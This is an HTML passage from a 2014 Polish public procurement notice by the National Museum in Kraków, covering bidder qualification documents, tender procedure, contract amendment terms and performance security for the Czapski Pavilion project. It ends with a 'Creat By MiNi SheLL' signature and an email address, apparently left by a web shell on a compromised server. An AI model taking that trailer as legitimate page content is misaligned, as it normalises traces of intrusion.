celu w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wartość 300.000,00 zł od jednego zdarzenia dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument potwierdzający spełnienie w/w warunku Wykonawcy mogą złożyć wspólnie. Metoda oceny spełniania warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę dokumentów: spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W zawartej umowie nie jest możliwe wprowadzanie istotnych zmian w stosunku  do treści oferty poza przewidzianymi w niniejszym ogłoszeniu.
Warunki i okoliczności uprawniające do wniosku o zmianę.
Zamawiający przewiduje i zastrzega sobie możliwość wprowadzenia następujących zmian w treści umowy w zakresie:
wszelkich terminów określonych umową i jej załącznikami, z wyłączeniem przyczyn niedotrzymania terminów realizacji umowy z winy Wykonawcy;
sposobu realizacji zamówienia, o ile wpływa ona pozytywnie na realizacje umowy dla obydwu stron (np. sposobu rozliczenia wynagrodzenia wykonawcy),
ceny brutto oraz wysokości naliczonego podatku od towarów i usług w przypadku zmiany ustawowej stawki podatku VAT (cena netto nie ulega zmianie);
zmiany osób realizujących zamówienie, wskazanych przez Wykonawcę w ofercie- na zasadach określonych w załączniku 4 specyfikacji (istotne postanowienia umowy),  
zmiana w zakresie podwykonawstwa. Wykonawca może dokonać zmiany w zakresie prac zleconych podwykonawcom jak również zmienić i wprowadzić podwykonawców lub wskazać   podwykonawców w nowym zakresie. Nowo wskazani podwykonawcy wymagają akceptacji pisemnej Zamawiającego. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia. 

Zamawiający przewiduje również możliwość zmiany zawartej umowy w następujących przypadkach:
gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy;
gdy nastąpi zmiana decyzji i opinii wydanych przez odpowiednie organy administracji publicznej;
w przypadku działania siły wyższej tj. okoliczności niezwykłych, niemożliwych do przewidzenia przy dochowaniu należytej staranności, niezależnych od strony, która się na nie powołuje. 

Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: 
powódź, pożar, 
     inne zdarzenia związane z działaniem sił natury, nietypowe dla tego obszaru, 
zamieszki, strajki, ataki terrorystyczne, działania wojenne, 
nieprzewidziane uszkodzenie lub zniszczenie obiektu budowlanego, urządzenia technicznego lub systemu urządzeń technicznych powodujące przerwę w ich używaniu lub utratę ich właściwości, bez których zrealizowanie założonego pierwotnie celu umowy stało się niemożliwe, 
Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych, których wystąpienie musi być normalnie brane pod uwagę podczas realizacji umowy.
Zmiany powyższe mogą być uzasadnione przyczynami prawnymi, organizacyjnymi.
Zamawiający na powyższy zakres przedłoży propozycję zmiany umowy w formie aneksu, którą to Wykonawca jest związany i nie przysługują mu w tym zakresie żadne roszczenia do Zamawiającego co do kwoty umownej, ewentualnego odszkodowania z tytułu utraty spodziewanych zysków. Procedura wprowadzania wszystkich zmian do umowy określonych w niniejszej specyfikacji.
Wniosek o zmianę każdorazowo musi zawierać:
opis proponowanej zmiany, 
wpływ na wykonanie dostawy stanowiącej przedmiot umowy,
proponowany termin wprowadzenia zmian, 
należy podać  jakie znaczenie ma zmiana dla zamawiającego lub czy jest konieczna dla wykonania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeum.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Narodowe, al. 3-go Maja 1, 30-062 Kraków, pok 050..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2014 godzina 10:00, miejsce: Muzeum Narodowe, al. 3-go Maja 1, 30-062 Kraków, pok 050..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie w ramach projektu pn.: Budowa Pawilonu Józefa Czapskiego w Muzeum Narodowym w Krakowie, realizowanego  zgodnie  z wytycznymi programu Konserwacja i  rewitalizacja dziedzictwa kulturowego w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2009-2014 i Norweskiego Mechanizmu Finansowego 2009-2014.

2. Zabezpieczenie należytego wykonania umowy.

Wybrany Wykonawca przed podpisaniem umowy zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy na sumę stanowiącą 10% ujętej w umowie wartości brutto w:
pieniądzu - wpłacone przelewem,poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze  zobowiązaniem pieniężnym, gwarancjach ubezpieczeniowych lub gwarancjach bankowych,poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt.2  ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości oraz niektórych ustaw (Dz. U. z 2007 r.  Nr 42 poz. 275).

Zabezpieczenie należytego wykonania umowy złożone w formie gwarancji, poręczeń winno być bezwarunkowo płatne na pierwsze żądanie Zamawiającego.

Zabezpieczenie należytego wykonania umowy wniesione w pieniądzu winno być wpłacone przelewem na konto Zamawiającego:  62 1030 1508 0000 0008 1536 0001 CITI HANDLOWY - Bank Handlowy w Warszawie. Nie  jest dopuszczalne wniesienie zabezpieczenia w pieniądzu  w formie gotówki.

Warunki i termin zwrotu lub zwolnienia zabezpieczenia należytego wykonania umowy. 

Zamawiający zwróci Wykonawcy 70% kwoty zabezpieczenia w terminie do 30 dni od dnia wykonania przedmiotu umowy i uznania go przez Zamawiającego za należycie wykonany poprzez zatwierdzenie raportu końcowego z wykonania zamówienia. 30% kwoty zabezpieczenia Zamawiający pozostawi na okres 3 lat na zabezpieczenie roszczeń z tytułu rękojmi i gwarancji. Pozostawiona kwota zabezpieczenia w wysokości 30% zostanie zwrócona nie później niż w 15 dniu po upływie okresu rękojmi za wady..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com